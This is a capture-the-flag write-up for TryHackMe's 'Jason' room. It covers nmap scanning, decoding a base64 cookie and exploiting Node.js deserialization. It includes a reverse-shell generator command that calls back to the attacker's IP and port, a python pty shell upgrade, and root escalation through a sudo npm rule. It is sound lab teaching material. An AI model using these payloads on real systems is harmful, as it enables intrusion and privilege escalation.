writeups/tryhackme/jason_writeup.md

# Trhyhackme Jason Writeup

* [Challenge](https://tryhackme.com/room/jason)

## Enumeration

### `sudo nmap -sV -sC -vv --script vuln -oA nmap-full 10.10.216.3`

* Output
```sh
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-09 18:09 CEST
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:09
Completed NSE at 18:09, 10.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:09
Completed NSE at 18:09, 0.00s elapsed
Initiating Ping Scan at 18:09
Scanning 10.10.216.3 [4 ports]
Completed Ping Scan at 18:09, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:09
Completed Parallel DNS resolution of 1 host. at 18:09, 0.04s elapsed
Initiating SYN Stealth Scan at 18:09
Scanning 10.10.216.3 [1000 ports]
Discovered open port 80/tcp on 10.10.216.3
Discovered open port 22/tcp on 10.10.216.3
Completed SYN Stealth Scan at 18:09, 1.18s elapsed (1000 total ports)
Initiating Service scan at 18:09
Scanning 2 services on 10.10.216.3
Completed Service scan at 18:10, 14.68s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.216.3.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:10
NSE Timing: About 98.89% done; ETC: 18:10 (0:00:00 remaining)
NSE Timing: About 98.89% done; ETC: 18:11 (0:00:01 remaining)
NSE Timing: About 98.89% done; ETC: 18:11 (0:00:01 remaining)
NSE Timing: About 98.89% done; ETC: 18:12 (0:00:01 remaining)
Completed NSE at 18:12, 131.13s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:12
Completed NSE at 18:12, 0.21s elapsed
Nmap scan report for 10.10.216.3
Host is up, received echo-reply ttl 63 (0.067s latency).
Scanned at 2021-10-09 18:09:50 CEST for 147s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:8.2p1:
|       CVE-2020-15778  6.8 https://vulners.com/cve/CVE-2020-15778
|       CVE-2020-12062  5.0 https://vulners.com/cve/CVE-2020-12062
|       MSF:ILITIES/GENTOO-LINUX-CVE-2021-28041/    4.6 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2021-28041/ *EXPLOIT*
|       CVE-2021-28041  4.6 https://vulners.com/cve/CVE-2021-28041
|       CVE-2021-41617  4.4 https://vulners.com/cve/CVE-2021-41617
[...]
80/tcp open  http    syn-ack ttl 63
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Sat, 09 Oct 2021 16:09:57 GMT
|     Connection: close
|     <html>
|     <title>Horror LLC</title>
       [...]
|     </html>
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:12
Completed NSE at 18:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:12
Completed NSE at 18:12, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.18 seconds
           Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.036KB)
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-09 18:09 CEST
```

### `ffuf -c -v -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.216.3/FUZZ -fs 3559`
Nothing of interest

### Website
![Alt text](../include/jason/horror_llc.png?raw=true "Landing page")
* Cookie value starts with `eyJlbW`, that's definetly the beginning of a json object encoded as base64.
![Alt text](../include/jason/cookie.png?raw=true "Cookie Value")
* Testing an input value
```sh
whackx@manbox jwt_tool]$ echo "eyJlbWFpbCI6ImJpbGwuZ2F0ZXNAbWljcm9zb2Z0LmNvbSJ9" | base64 -d
{"email":"bill.gates@microsoft.com"}
```
* Assumption: this is the point of interest

### Finding intel
* Data gets serialized via backend node js. 
![Alt text](../include/jason/searchsploit.png?raw=true "Searchsploit")

## Exploit
* After searching for deserialization exploits and getting the hang of it, I spent some time crafting payloads manually without any luck. I took a look at some node shell generators and came up with [this one](https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py). This did the trick. Pasting the payload, and we get a shell
```
python2  tools/reverse_shells/node_shell.py -r -h 10.9.47.11 -p 4448 -e  -o
```
### Enumerating the server
```sh
$id
uid=1000(dylan) gid=1000(dylan) groups=1000(dylan)

$ pwd
/opt/webapp

$ cat /etc/passwd
[...]
dylan:x:1000:1000:dylan:/home/dylan:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
```
* `dylan` is not in the lxd group.
* Flag is at `/home/dylan/user.txt`

#### Shell upgrade
```sh
uname -a
linux jason 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
```
* It is ubuntu, shell upgrade will contain a 3 ;)
```sh
python3 -c "import pty;pty.spawn('/bin/bash')"
```
* `stty raw -echo` Locally
* `export TERM=xterm-256color` on target
* Shell is interactive now, `sudo -l` is the next step.
```sh
dylan@jason:/opt/webapp$ sudo -l
Matching Defaults entries for dylan on jason:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dylan may run the following commands on jason:
    (ALL) NOPASSWD: /usr/bin/npm *
```
* Take a good look at [gtfobins](https://gtfobins.github.io) and get the root flag
![Alt text](../include/jason/root_shell.png?raw=true "Root shell")